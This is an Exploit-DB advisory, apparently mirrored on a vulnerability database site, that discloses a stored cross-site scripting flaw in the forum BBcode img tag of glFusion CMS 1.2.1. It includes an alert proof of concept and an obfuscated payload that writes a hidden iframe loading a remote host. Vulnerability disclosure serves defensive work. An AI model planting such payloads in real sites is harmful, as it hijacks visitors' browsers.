Search...

glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting

2011-01-15T00:00:00

ID EDB-ID:15995
Type exploitdb
Reporter Saif
Modified 2011-01-15T00:00:00

Description

                                        
                                            # Exploit Title: glfusion CMS 1.2.1 stored XSS via img tag
# Date: 14-1-2010
# Author: Saif El-Sherei
# Software Link:
www.glfusion.org/filemgmt/viewcat.php?cid=1&lt;http://php.opensourcecms.com/scripts/redirect/download.php?id=33&gt;
# Version: 1.2.1
# Tested on: Firefox 3.0.15

Info:
*
glFusion &lt;http://www.glfusion.org/&gt;* gives you the ability to easily create
websites and online communities complete with add-ons like Forums,
CAPTCHA/Spam filters, Calendars, File & Media Gallery management solutions,
WYSIWYG editors, and MooTools AJAX support, all right out of the box.


Details:

Failure to sanitize the BBcode image tags in the forum posts allows attacker
to perform XSS attacks. also noted that u can't inject any "src" attribute
in the attack so we use the second POC.


POC:

[img w=30&gt;&lt;script&gt;alert(123);&lt;/script&gt; h=30]images/help.png[/img]

[img
w=30&gt;&lt;script&gt;document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,51,49,46,49,50,56,58,56,48,56,48,47,34,32,104,101,105,103,104,116,61,34,48,34,32,119,105,100,116,104,61,34,48,34,62));&lt;/script&gt;
h=30]x[/img]

Regards,

Saif El-Sherei

OSCP

JSON Vulners Source

Initial Source

{"id": "EDB-ID:15995", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting", "description": "", "published": "2011-01-15T00:00:00", "modified": "2011-01-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/15995", "reporter": "Saif", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T06:48:26", "viewCount": 9, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://www.exploit-db.com/download/15995", "sourceData": "# Exploit Title: glfusion CMS 1.2.1 stored XSS via img tag\r\n# Date: 14-1-2010\r\n# Author: Saif El-Sherei\r\n# Software Link:\r\nwww.glfusion.org/filemgmt/viewcat.php?cid=1<http://php.opensourcecms.com/scripts/redirect/download.php?id=33>\r\n# Version: 1.2.1\r\n# Tested on: Firefox 3.0.15\r\n\r\nInfo:\r\n*\r\nglFusion <http://www.glfusion.org/>* gives you the ability to easily create\r\nwebsites and online communities complete with add-ons like Forums,\r\nCAPTCHA/Spam filters, Calendars, File & Media Gallery management solutions,\r\nWYSIWYG editors, and MooTools AJAX support, all right out of the box.\r\n\r\n\r\nDetails:\r\n\r\nFailure to sanitize the BBcode image tags in the forum posts allows attacker\r\nto perform XSS attacks. also noted that u can't inject any \"src\" attribute\r\nin the attack so we use the second POC.\r\n\r\n\r\nPOC:\r\n\r\n[img w=30><script>alert(123);</script> h=30]images/help.png[/img]\r\n\r\n[img\r\nw=30><script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,51,49,46,49,50,56,58,56,48,56,48,47,34,32,104,101,105,103,104,116,61,34,48,34,32,119,105,100,116,104,61,34,48,34,62));</script>\r\nh=30]x[/img]\r\n\r\nRegards,\r\n\r\nSaif El-Sherei\r\n\r\nOSCP", "osvdbidlist": ["72073"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645376246}}

glfusion CMS 1.2.1 - &#039;img&#039; Persistent Cross-Site Scripting

Description

glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting